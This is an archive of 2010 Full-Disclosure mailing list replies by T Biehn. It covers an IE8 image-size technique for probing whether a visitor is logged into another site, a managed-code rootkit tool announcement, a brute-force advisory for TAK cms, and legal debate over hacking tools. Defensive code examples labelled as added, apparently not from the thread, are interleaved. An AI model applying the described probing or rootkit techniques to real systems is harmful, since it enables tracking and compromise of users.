>>
>
>


-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] What do you guys think about it?

2010-05-31 Thread T Biehn
If you thought this article had any merit then it is true for you.
Swap over to Hamburger University kids, nothing to see here.

If you thought this article was bullshit then that is true for you.

It's just too bad this wasn't by design, eh?

-Travis

On Mon, May 31, 2010 at 12:04 PM, Georgi Guninski wrote:

> why discriminate the gals?
>
> if we are lucky there may be a gal or 2 left on the nice list ;)
>
> On Fri, May 28, 2010 at 04:18:58PM -0300, Rafael Moraes wrote:
> > Read and give your opinion!
> >
> > http://www.networkworld.com/community/node/60303
> >
> > --
> > Regards,
> > Rafael Moraes
> > Linux Professional Institute Certified - LPI 2
> > Novell Certified Linux Administrator - CLA
> > Data Center Technical Specialist - DCTS
> > ITIL Foundations Certified
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] What are the basic vulnerabilities of a software?

2010-05-31 Thread T Biehn
Misuse, mis-implementation of cryptographic primitives.

Errors in state based code, skipping authentication states and moving to
authenticated states, for instance.

For everything else see whatever publication.

Why did I answer this :(

-Travis

On Mon, May 31, 2010 at 8:56 AM, Christian Sciberras wrote:

> 0. Human error.
>
>
>
>
>
>
>
> On Mon, May 31, 2010 at 11:50 AM, rajendra prasad <
> rajendra.paln...@gmail.com> wrote:
>
>> Hi List,
>> I am preparing a list of main and basic vulnerabilities in software.
>> Please let me know If you know other than the below list.
>> List of Basic Vulnerabilities:
>> 1. Buffer Overflow: Stack, Heap.
>> 2. Format String Vulnerabilities
>> 3. SQL Injections
>> 4. XSS Vulnerabilities
>>
>> Thanks
>> Rajendra Prasad.Palnaty
>>
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] Stealthier Internet access

2010-05-31 Thread T Biehn
Bipin;
Firstly: You know what you did.
Secondly: Screw you for not crediting the master.

(I am the master, you are the dog.)

Greetz & Love, Harmonious Profitability!

-Travis

On Wed, May 26, 2010 at 1:03 AM,  wrote:

> On Wed, 26 May 2010 10:15:32 +0545, Bipin Gautam said:
> > > it's a *bad* sector, so reading and recovering the data is a bitch...
> >
> > No, storing in Negative Disk, bad sector, stenography, slack space are
> > all bad places to store data!
>
> No, I meant it's usually not worth worrying that if the disk has done a
> hardware assignment of a replacement sector for a *real* live actual
> the-hardware-barfs-on-it bad sector, you can usually not worry about the
> contents of that bad sector, as the drive hardware won't let you access it
> directly anymore, redirecting you to the new replacement block.  So
> basically, somebody needs to take the disk apart and start doing the
> clean-room data recovery routine off the disk, trying to read 512 bytes of
> data at a time off known-physically-bad areas of the disk.
>
> And if your threat model includes adversaries that will do that, then
> you *really* need to be using full-disk encryption and thermite in your
> counter-defenses.  Oh, and a good countermeasure for rubber-hose crypto. ;)
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] JavaScript exploits via source code disclosure

2010-05-06 Thread T Biehn
A proxy or 'web-service firewall' prior to the 'protected' web service is
the correct answer.

Obfuscating the client code be it JavaScript, Interpreted (Java, CLR, etc)
or Native ignores the notion that the client controls hardware, OS, the
executing process and the network.

Signals can be intercepted at any layer.

Any other assertion is ridiculous and a waste of time and effort.

-Travis

On Thu, May 6, 2010 at 1:08 PM, Elazar Broad  wrote:

> Unless you wrap your service methods with some form of an
> authentication, your webservice's are just as public as any other
> "world" accessible part of your site. Are the pages calling these
> services behind any sort of authentication?
>
> On Thu, 06 May 2010 01:44:07 -0400 Ed Carp  wrote:
> >We've got a lot of JQuery code that calls back-end web services,
> >and
> >we're worried about exposing the web services to the outside world
> >-
> >anyone can "view source" and see exactly how we're calling our web
> >services.
> >
> >Are there any suggestions or guidelines regarding protecting one's
> >source from such disclosure?  Thanks in advance!
> >
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
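
The control both replies above point to, authentication on every service method enforced at a gateway in front of the service, is sketched here as an added example that is not code from the thread. The method names, roles, sessions and the `authorize` function are assumptions made for illustration; the point is that every decision uses server-side state, so what "view source" reveals about the calls does not matter.

```javascript
// Added example: deny-by-default checks for a gateway placed in front of JSON
// web services. Method names, roles and sessions are constructed.

function isShortString(v) { return typeof v === 'string' && v.length > 0 && v.length <= 64; }
function isEmail(v) { return typeof v === 'string' && /^[^@\s]{1,64}@[^@\s]{1,255}$/.test(v); }
function isPositiveInt(v) { return Number.isInteger(v) && v > 0; }

// Every callable method is listed here; anything not listed is not reachable,
// even if the backend happens to implement it.
const POLICY = {
  'catalog.search':     { roles: ['anonymous', 'user', 'admin'], params: { q: isShortString } },
  'account.getProfile': { roles: ['user', 'admin'],              params: {} },
  'account.setEmail':   { roles: ['user', 'admin'],              params: { email: isEmail } },
  'admin.deleteUser':   { roles: ['admin'],                      params: { userId: isPositiveInt } },
};

// Server-side session table (constructed). Expiry is a millisecond timestamp.
const GATEWAY_SESSIONS = new Map([
  ['s-user',  { user: 'alice', role: 'user',  expiresMs: 2000000 }],
  ['s-admin', { user: 'root',  role: 'admin', expiresMs: 2000000 }],
  ['s-old',   { user: 'carol', role: 'admin', expiresMs: 500000 }],
]);

// Own-property test, so names like "__proto__" or "constructor" never match.
const has = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Identity comes from the session table only, never from request parameters.
function resolveSession(sessionId, nowMs) {
  const s = typeof sessionId === 'string' ? GATEWAY_SESSIONS.get(sessionId) : undefined;
  if (!s || s.expiresMs <= nowMs) return { user: null, role: 'anonymous' };
  return { user: s.user, role: s.role };
}

// Decide whether a request { method, params, sessionId } may reach the backend.
function authorize(request, nowMs) {
  if (typeof request.method !== 'string' || !has(POLICY, request.method)) {
    return { status: 404, reason: 'method not exposed' };
  }
  const rule = POLICY[request.method];
  const who = resolveSession(request.sessionId, nowMs);
  if (!rule.roles.includes(who.role)) {
    // 401: no valid session at all; 403: valid session, insufficient role.
    return { status: who.role === 'anonymous' ? 401 : 403, reason: 'role not permitted' };
  }
  const params = request.params || {};
  if (typeof params !== 'object' || Array.isArray(params)) {
    return { status: 400, reason: 'params must be an object' };
  }
  for (const key of Object.keys(params)) {
    if (!has(rule.params, key)) return { status: 400, reason: 'unexpected parameter ' + key };
  }
  for (const key of Object.keys(rule.params)) {
    if (!has(params, key) || !rule.params[key](params[key])) {
      return { status: 400, reason: 'invalid parameter ' + key };
    }
  }
  // The backend receives the caller's identity as established by the gateway.
  return { status: 200, forward: { method: request.method, params: { ...params }, caller: who.user } };
}
```
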

Re: [Full-disclosure] go public to avoid jail

2010-05-03 Thread T Biehn
I once logged a guy on IRC who said he was going to packet me off the face
of the tubes.
So I sent my Mirc logs to the FBI when I lost my AOL connection.

He went to jail forever.

-Travis

On Mon, May 3, 2010 at 1:56 PM, J Roger  wrote:

> I can see that you have no experience with the legal system other than
>> what you've seen on TV (which is, to say, none at all).
>>
>
> I know this is the Internet but you don't need to be quite so rude. Perhaps
> I just haven't been arrested (caught) as many times as you have.
>
>
> If you read
>> the IRC logs presented by the prosecution, it is pretty clear what the
>> motive was.
>>
>
> I have not seen these IRC logs. Have you? Could you provide a reference for
> them please?
>
>
> JRoger
>
> On Mon, May 3, 2010 at 10:46 AM, Ed Carp  wrote:
>
>> I can see that you have no experience with the legal system other than
>> what you've seen on TV (which is, to say, none at all).  If you read
>> the IRC logs presented by the prosecution, it is pretty clear what the
>> motive was.  Your "release it to the public and you have no liability"
>> argument will land you in prison if you try it - go to any attorney
>> and ask.  Your emotional "prove Stephen is a saint" attempt at
>> twisting what happens in the legal system doesn't change the FACT that
>> the burden of proof was easily met by the prosecution and that the
>> defense's arguments, while designed to sway people more used to
>> emotional appeals than logic, did little to impress the court, with
>> very predictable results.
>>
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] go public to avoid jail

2010-05-03 Thread T Biehn
Which is why this analogy is flawed.

-Travis

On Mon, May 3, 2010 at 12:27 PM, Marsh Ray  wrote:

>
> If your knife is found in a dead body, you're going to have some
> explaining to do.
>
> If it turns out that you're a restaurant supply business that sells 3000
> of that model knife a week, then you don't have a problem.
>
> If your buddy comes to you and says "I'm going to go stab some people
> and take their money will you construct for me a custom knife
> particularly well-suited for that purpose" and you say "sure, here you
> go, heh, no charge this time" and this conversation is recorded as
> evidence then both of you are going to get prosecuted.
>
> No one (seriously, no one) is going to be the least bit impressed by the
> "factories sell knives all the time" argument. The point is that you
> knew this specific knife was intended to be used for this purpose and
> you decided to go out of your way to help.
>
> Hacking/pen-test tools can definitely push the gray area a bit, but the
> custom-knife-in-dead-body example does not.
>
> - Marsh
>
> On 5/3/2010 5:34 AM, Christian Sciberras wrote:
> > No, I'm being damn realistic. If it weren't me providing a knife to "my
> > buddy" it would be someone else, or some kitchen drawer.
> >
> > Also, why do I go to jail, not the shop owner that sold me the knife? Or
> > the factory owner?
> >
> > It's this guy that should be liable to the crime, not the provider.
> >
> >
> > On Mon, May 3, 2010 at 12:04 PM, Ed Carp  wrote:
> >
> >> Oh, stop it.  If you give your buddy a knife, knowing they're going to
> >> go out and stab someone with it, you're going to jail, too.  Stop
> >> playing the fool.
> >>
> >
> >
> >
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] go public to avoid jail

2010-05-03 Thread T Biehn
It's important to create a thriving market for these utilities, and as part
of the internet community to foster their development.
The 'malicious code' -> profit ecosystem is paramount to maintaining order
between corporate, governmental and public interests.

lol.

-Travis

On Mon, May 3, 2010 at 7:08 AM, Dietz Pröpper wrote:

> Ed Carp:
> > How about not writing a hacking tool in the first place that you know
> > will be used to rip other people off??  Wow...what a concept...OF
> > COURSE he knew the code he was writing was going to be used to rip
> > people off.
>
> How about closing mailing lists like the one you posted to?
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] go public to avoid jail

2010-04-29 Thread T Biehn
But he was a verified paypal buyer, your honor.
lols.
-Travis

On Thu, Apr 29, 2010 at 12:32 PM, Stephen Mullins <
steve.mullins.w...@gmail.com> wrote:

> That might work if you went through some sort of "official" channels
> with a bill of sale and so forth.  Claiming that you sold it to "some
> guy on irc" after a paypal payment cleared your account probably
> wouldn't be much of a defense in court.
>
> On Thu, Apr 29, 2010 at 12:05 PM, T Biehn  wrote:
> > Or you could just auction it off to the 'highest bidder.'
> >
> > -Travis
> >
> > On Tue, Apr 27, 2010 at 6:48 PM, J Roger wrote:
> >>
> >> An important lesson from childhood, sharing, could help keep you out of
> >> jail.
> >>
> >> According to the following (dated) Wired article,
> >> http://www.wired.com/threatlevel/2009/12/stephen-watt/ Stephen Watt got
> >> screwed because he supplied his friend with a software tool he wrote and
> >> his friend used it to commit a crime.
> >>
> >> Had Stephen released his tool to the public (with as much or as little
> >> fanfare as he liked) would he still have gone to jail?
> >>
> >> He could make a good argument for legitimate uses of his tool as well.
> >> It would be useful for anyone performing a PCI penetration test in
> >> compliance with PCI DSS 11.3
> >>
> >> Remember kids, sharing is caring (that you not spend the next 2 years in
> >> federal prison)
> >>
> >
> >
> >
> > --
> > FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
> > http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
> > http://pastebin.com/f6fd606da
> >
> >
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] go public to avoid jail

2010-04-29 Thread T Biehn
Or you could just auction it off to the 'highest bidder.'

-Travis

On Tue, Apr 27, 2010 at 6:48 PM, J Roger  wrote:

> An important lesson from childhood, sharing, could help keep you out of
> jail.
>
> According to the following (dated) Wired article,
> http://www.wired.com/threatlevel/2009/12/stephen-watt/ Stephen Watt got
> screwed because he supplied his friend with a software tool he wrote and his
> friend used it to commit a crime.
>
> Had Stephen released his tool to the public (with as much or as little
> fanfare as he liked) would he still have gone to jail?
>
> He could make a good argument for legitimate uses of his tool as well. It
> would be useful for anyone performing a PCI penetration test in compliance
> with PCI DSS 11.3
>
> Remember kids, sharing is caring (that you not spend the next 2 years in
> federal prison)
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da

Re: [Full-disclosure] IE8 img tag HiJacking

2010-04-22 Thread T Biehn
Hey, you actually posted information! Congrats!
Did you learn about this 'information channel' from your numerous 'blackhat'
friends?

-Travis

On Apr 22, 2010 2:17 PM, "Dan Kaminsky"  wrote:

Also, Billy Hoffman has done a lot of fun work in this space, see
http://www.gnucitizen.org/blog/javascript-remoting-dangers/



2010/4/22 Dan Kaminsky :

> Interesting use, using filesize to back into the actual CAPTCHA used for a
> given query.  Sneaky!...

Re: [Full-disclosure] IE8 img tag HiJacking

2010-04-22 Thread T Biehn
It could be used as a technique for defeating the login images used as
"two-factor-authentication" by some online services.
The application of using filesize to fingerprint an image is somewhat novel.
This is a decidedly 'old' vector, though.

-Travis

2010/4/21 Владимир Воронцов 

> Hello Full disclosure!
>
> Once again, unwinding theme HiJacking found a fun way to get the very
> least information about the target resource when the user is located at the
> attacker.
>
> Already crocked <img> tag opens new opportunities using the method
> fileSize, described here:
> http://msdn.microsoft.com/en-us/library/ms533752(v=VS.85).aspx
>
> Consider a simple example - a Web application after authentication
> provides some sort of picture for the user, for example:
>
> http://example.com/getImage.php?image=myAvatar
>
> The attacker, knowing this can create a page to read:
>
> http://example.com/getImage.php?image=myAvatar";>
>
> 
>
> Thus, the attacker learns the simplest case, whether the target user
> access to example.com.
>
> Continuing the theme, I want to note that in some cases, can obtain
> additional information from the very values of the size of the picture. It
> can be any logical information Web applications, say, the same script can
> show administrators a picture of the same size, and users - of another.
> Thus, we obtain the user rights. And so on.
>
> I'd like to return the size of the method is not only "valid" images, but
> also HTML pages, JSON, etc. But, unfortunately, does not work. Maybe, of
> course, there are exceptions, call to investigate the matter.
>
> I have some thoughts on the study of vector images in XML format, because
> HTML is often valid XML, and then ...
>
> Check for the test version IE9, but he did not support SVG inside tag
> <img>, but only as a separate tag.
>
> Works in IE8, in Opera 10.52 does not work on check writing, if not
> difficult.
>
> Original in Russian: http://oxod.ru/?p=113
>
> --
> Best regards,
> Vladimir Vorontsov
> ONsec security expert
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
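
The size side channel described in the quoted post disappears once a request made from another site receives the same bytes whatever the visitor's login state or role. The following added example, which is not code from the thread, puts a handler that leaks next to one that does not; the session ids, image tokens, image sizes and function names are constructed, and `Cross-Origin-Resource-Policy` is a response header of current browsers rather than of IE8.

```javascript
// Added example: an avatar endpoint whose response size depends on the session
// (as in the quoted getImage.php case) beside a version that gives third-party
// pages nothing to measure. All sessions, tokens and sizes are constructed.

const SESSIONS = new Map([
  ['sid-alice', { user: 'alice', role: 'user',  imageToken: 'tok-4f9c2d7a' }],
  ['sid-root',  { user: 'root',  role: 'admin', imageToken: 'tok-b81e06c3' }],
]);

// Stand-ins for image files; only their lengths matter here.
const IMAGES = {
  placeholder: 'P'.repeat(512),
  alice: 'A'.repeat(1800),
  root: 'R'.repeat(4096),
};

// Comparison that does not stop at the first differing character.
function sameString(a, b) {
  if (a.length === 0 || b.length === 0) return false;
  let diff = a.length ^ b.length;
  for (let i = 0; i < a.length; i++) {
    diff |= a.charCodeAt(i) ^ b.charCodeAt(i % b.length);
  }
  return diff === 0;
}

// Leaky: the session cookie alone selects the image. A browser attaches that
// cookie to an <img> request from any site, so size reveals login and role.
function serveAvatarLeaky(req) {
  const s = SESSIONS.get(req.cookieSid);
  if (!s) return { status: 403, headers: {}, body: '' };
  return { status: 200, headers: {}, body: IMAGES[s.user] };
}

// Hardened: the personal image also requires a per-session token that only the
// site's own pages embed in the URL. Every other request, logged in or not,
// gets the same placeholder with the same status and length.
function serveAvatar(req) {
  const s = SESSIONS.get(req.cookieSid);
  const ok = Boolean(s) && typeof req.token === 'string' && sameString(req.token, s.imageToken);
  return {
    status: 200,
    headers: {
      // Current browsers refuse to load this response into another origin's page.
      'Cross-Origin-Resource-Policy': 'same-origin',
      'Cache-Control': 'private, no-store',
    },
    body: ok ? IMAGES[s.user] : IMAGES.placeholder,
  };
}

// What a measuring page could learn: the distinct sizes seen across visitors.
function distinctSizes(handler, requests) {
  return new Set(requests.map((r) => handler(r).body.length)).size;
}

// Requests as they would arrive from a third-party page: cookie, no token.
const CROSS_SITE = [{ cookieSid: 'sid-alice' }, { cookieSid: 'sid-root' }, {}];
```
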

Re: [Full-disclosure] [Tool] ReFrameworker 1.1

2010-04-20 Thread T Biehn
Awesome. A+ ruin.

2010/4/19 Erez Metula :
> Hi all,
> I'm happy to announce about a new version of ReFrameworker V1.1 !
>
> ReFrameworker is a general purpose Framework modifier, used to reconstruct
> framework Runtimes by creating modified versions from the original
> implementation that was provided by the framework vendor. ReFrameworker
> performs the required steps of runtime manipulation by tampering with the
> binaries containing the framework's classes, in order to produce modified
> binaries that can replace the original ones.
> It was developed to experiment with and demonstrate deployment of MCR
> (Managed Code Rootkits) code into a given framework. MCR is a special type
> of malicious code that is deployed inside an application level virtual
> machine such as those employed in managed code environment frameworks –
> Java, .NET, Dalvik, Python, etc..
> Having the full control of the managed code VM allows the MCR to lie to the
> upper level application running on top of it, and manipulate the application
> behavior to perform tasks not intended originally by the software developer.
> ReFrameworker was demonstrated (in his former incarnation as ".NET-Sploit")
> at BlackHat, Defcon, RSA, OWASP and other places. The new version will be
> demonstrated this week at SOURCE Boston conference, for the first time.
> More information on ReFrameworker and MCR will be available with the soon to
> be published book "Managed Code Rootkits", by Syngress publishing.
>
> Among its features:
> - Performs all the required steps needed for modifying framework binaries
> (disassemble, code injection, reassemble, precompiled images cleaning, etc.)
> - Fast development and deployment of a modified behavior into a given
> framework
> - Auto generated deployers
> - Modules: a separation between general purpose "building blocks" that can
> be injected into any given binary, allowing the users to create small pieces
> of code that can be later combined to form a specific injection task.
> - Can be easily adapted to support multiple frameworks by minimal
> configuration (currently comes preconfigured for the .NET framework)
> - Comes with many "preconfigured" proof-of-concept attacks (implemented as
> modules) that demonstrate its usage that can be easily extended to perform
> many other things.
>
> ReFrameworker, as a general purpose framework modification tool, can be used
> in other contexts besides security such as customizing frameworks for
> performance tuning, Runtime tweaking, virtual patching, hardening, and
> probably other usages - It all depends on what it is instructed to do.
>
> It can be downloaded from here:
> http://www.appsec.co.il/Managed_Code_Rootkits
>
> ---
> Erez Metula
>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Vulnerabilities in TAK cms

2010-04-09 Thread T Biehn
lol.

On Thu, Apr 8, 2010 at 4:30 PM, Benji  wrote:
> nah, he'd be telling us how that was an easy way to find valid accounts.
>
> -Benji
>
> On Thu, Apr 8, 2010 at 6:30 PM, T Biehn  wrote:
>>
>> If there were an account lockout after 5 tries would you be telling us
>> about how there was a DOS vector on the same software?
>>
>> -Travis
>>
>> On Mon, Apr 5, 2010 at 4:35 PM, MustLive 
>> wrote:
>> > Hello Full-Disclosure!
>> >
>> > I want to warn you about security vulnerabilities in TAK cms. It's
>> > Ukrainian
>> > commercial CMS.
>> >
>> > -
>> > Advisory: Vulnerabilities in TAK cms
>> > -
>> > URL: http://websecurity.com.ua/4050/
>> > -
>> > Timeline:
>> > 04.02.2009 - found vulnerabilities.
>> > 30.09.2009 - informed owners of web sites where I found these
>> > vulnerabilities. Taking into account, that I didn't find any contact
>> > data of
>> > developer of TAK cms, then I hope, that owners of that site informed him
>> > about these vulnerabilities. This is one of those cases with commercial
>> > CMS,
>> > where developers didn't leave any contact data and there is no
>> > information
>> > about them in Internet.
>> > 19.03.2010 - disclosed at my site.
>> > -
>> > Details:
>> >
>> > These are Insufficient Anti-automation and Brute Force vulnerabilities.
>> >
>> > Insufficient Anti-automation:
>> >
>> > http://site/about/contacts/
>> > http://site/register/getpassword/
>> >
>> > At these pages there is no protection from automated requests
>> > (captcha).
>> >
>> > Brute Force:
>> >
>> > http://site/auth/
>> > http://site/admin/
>> >
>> > In login forms there is no protection from Brute Force attacks.
>> >
>> > Vulnerable are all versions of TAK cms.
>> >
>> > Best wishes & regards,
>> > MustLive
>> > Administrator of Websecurity web site
>> > http://websecurity.com.ua
>> >
>> >
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
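
The two objections raised in this thread (a hard lockout becomes a denial-of-service lever, and it can reveal which accounts exist), worked through as an added Python example that is not part of the original posts and not TAK cms code. The class names, thresholds and addresses are assumptions chosen for illustration.

```python
import time
from collections import defaultdict


class HardLockout:
    """Policy debated in the thread: lock an account after `limit` failures."""

    def __init__(self, limit=5):
        self.limit = limit
        self.failures = defaultdict(int)  # username -> failures from anyone

    def check(self, username, source):
        return "allow" if self.failures[username] < self.limit else "locked"

    def record_failure(self, username, source):
        self.failures[username] += 1


class BackoffThrottle:
    """Exponential delay keyed on (username, source).

    Failures summed per account never deny a login; they only demand an extra
    challenge (a CAPTCHA, for instance), so a third party cannot lock the
    owner out. The user database is never consulted, so an unknown username
    is treated exactly like a real one.
    """

    def __init__(self, free=3, base=2.0, cap=900.0, challenge_after=20,
                 clock=time.monotonic):
        self.free, self.base, self.cap = free, base, cap
        self.challenge_after = challenge_after
        self.clock = clock
        self.pair = {}                       # (username, source) -> (failures, last failure time)
        self.per_account = defaultdict(int)  # username -> failures from all sources

    def check(self, username, source):
        """Return (decision, seconds_to_wait)."""
        fails, last = self.pair.get((username, source), (0, 0.0))
        if fails > self.free:
            exponent = min(fails - self.free - 1, 30)  # keep the power bounded
            wait = min(self.cap, self.base * 2 ** exponent)
            remaining = last + wait - self.clock()
            if remaining > 0:
                return ("delay", remaining)
        if self.per_account[username] >= self.challenge_after:
            return ("challenge", 0.0)
        return ("allow", 0.0)

    def record_failure(self, username, source):
        fails, _ = self.pair.get((username, source), (0, 0.0))
        self.pair[(username, source)] = (fails + 1, self.clock())
        self.per_account[username] += 1

    def record_success(self, username, source):
        self.pair.pop((username, source), None)
        self.per_account[username] = 0


class FakeClock:
    """Deterministic clock so the demonstration runs instantly."""

    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now


# Constructed sample addresses from the documentation ranges.
GUESSER, OWNER_HOME = "203.0.113.9", "198.51.100.7"


def run_demo():
    clock = FakeClock()
    hard, soft = HardLockout(limit=5), BackoffThrottle(clock=clock)
    # Five bad passwords from one source, against a real and an unknown name.
    for _ in range(5):
        for name in ("alice", "no-such-user"):
            hard.record_failure(name, GUESSER)
            soft.record_failure(name, GUESSER)
    # Twenty different sources, one bad password each, against "bob".
    for i in range(20):
        soft.record_failure("bob", f"192.0.2.{i}")
    results = {
        "hard_owner": hard.check("alice", OWNER_HOME),
        "soft_owner": soft.check("alice", OWNER_HOME),
        "soft_guesser": soft.check("alice", GUESSER),
        "soft_unknown_user": soft.check("no-such-user", GUESSER),
        "soft_distributed": soft.check("bob", OWNER_HOME),
    }
    clock.now += 4.0
    results["soft_guesser_after_wait"] = soft.check("alice", GUESSER)
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The hard lockout shuts the account owner out after someone else's five failures, while the throttle slows only the guessing source and answers identically for a name that does not exist.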



Re: [Full-disclosure] Vulnerabilities in TAK cms

2010-04-08 Thread T Biehn
If there were an account lockout after 5 tries would you be telling us
about how there was a DOS vector on the same software?

-Travis

On Mon, Apr 5, 2010 at 4:35 PM, MustLive  wrote:
> Hello Full-Disclosure!
>
> I want to warn you about security vulnerabilities in TAK cms. It's Ukrainian
> commercial CMS.
>
> -
> Advisory: Vulnerabilities in TAK cms
> -
> URL: http://websecurity.com.ua/4050/
> -
> Timeline:
> 04.02.2009 - found vulnerabilities.
> 30.09.2009 - informed owners of web sites where I found these
> vulnerabilities. Taking into account, that I didn't find any contact data of
> developer of TAK cms, then I hope, that owners of that site informed him
> about these vulnerabilities. This is one of those cases with commercial CMS,
> where developers didn't leave any contact data and there is no information
> about them in Internet.
> 19.03.2010 - disclosed at my site.
> -
> Details:
>
> These are Insufficient Anti-automation and Brute Force vulnerabilities.
>
> Insufficient Anti-automation:
>
> http://site/about/contacts/
> http://site/register/getpassword/
>
> At these pages there is no protection from automated requests (captcha).
>
> Brute Force:
>
> http://site/auth/
> http://site/admin/
>
> In login forms there is no protection from Brute Force attacks.
>
> Vulnerable are all versions of TAK cms.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Security system

2010-04-02 Thread T Biehn
Can't hurt.
I don't trust machines in DCs much less VPSs.

An adversary with the resources and motivation to kill power, net, and
jam GSM when they're pwning your house would probably be able to know
about and take out your watchdog box in the same move.

-Travis

On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton  wrote:
> On Tuesday, March 30, 2010, T Biehn  wrote:
>> Nah, I'm saying a GSM jammer would block your prepaid cell signal.
>>
>> So if your adversary were to cut the power, cut the net AND jam GSM
>> you'd be out of luck in getting notification.
>
> Very tru, tho u can combine this with a remote box that reacts iff it
> no longer cant reach ur home box. Tht wy they cant just block outgoing
> signals n be clear
>
>>
>> You can get all fancy and have your program try all methods available.
>> Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc.
>>
>> -Travis
>>
>> On Tue, Mar 30, 2010 at 10:39 AM,   wrote:
>>> Good idea u saying also I should by a gsm jammer this a good idea I will
>>> try.
>>>
>>> Sent from my iPhone
>>>
>>> On Mar 30, 2010, at 11:30 AM, T Biehn  wrote:
>>>
>>>> Buy a prepaid cell, rig your comp & phone up to a battery backup.
>>>> Breakout board on your Serial port, or from a USB-DB9 RS232 adapter.
>>>>
>>>> Have the text message banged out on the prepaid, rig wires from the
>>>> breakout board to the cell phone, rig wires from your security sensors
>>>> into your breakout board. App to listen on com port send a nice high
>>>> signal to the pin connecting to your send key.
>>>>
>>>> Done.
>>>>
>>>> Like, 50$ for the phone incld. minutes.
>>>> Like less than 20$ for a breakout board.
>>>>
>>>> Also, rig the ringer up to an input on the breakout board and you can
>>>> call your phone to clear your FDE keys from RAM and kill your machine
>>>> if you think the man is paying a visit once you get a text :)
>>>>
>>>> Some adversaries will cut net, hardline, sometimes power.
>>>>
>>>> Attacks: GSM jammers, which everyone has.
>>>>
>>>> -Travis
>>>>
>>>> On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar  wrote:
>>>>>
>>>>> Try arduino + internet.
>>>>>
>>>>> 2010/3/27 
>>>>>>
>>>>>> Anyone got any ideas how I would program a system to call me from a
>>>>>> voip network to alert me of a home security breach.
>>>>>>
>>>>>> Sent from my iPhone
>>>>>>
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>>>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>>>> http://pastebin.com/f6fd606da
>>>
>>
>>
>>
>> --
>> FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
>> http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
>> http://pastebin.com/f6fd606da
>>
>>
>



-- 
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehn&op=index&fingerprint=on
http://pastebin.com/f6fd606da
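
The remote box suggested in this exchange, one that reacts when it can no longer reach the home box, as an added Python example that is not code from any poster. It goes one step beyond the thread by authenticating each heartbeat, so that silence cannot be masked by replaying or forging check-ins; the message layout, key, interval and timeout are assumptions.

```python
import hashlib
import hmac
import struct

BODY = struct.Struct(">QB")               # 8-byte counter, 1-byte sensor status
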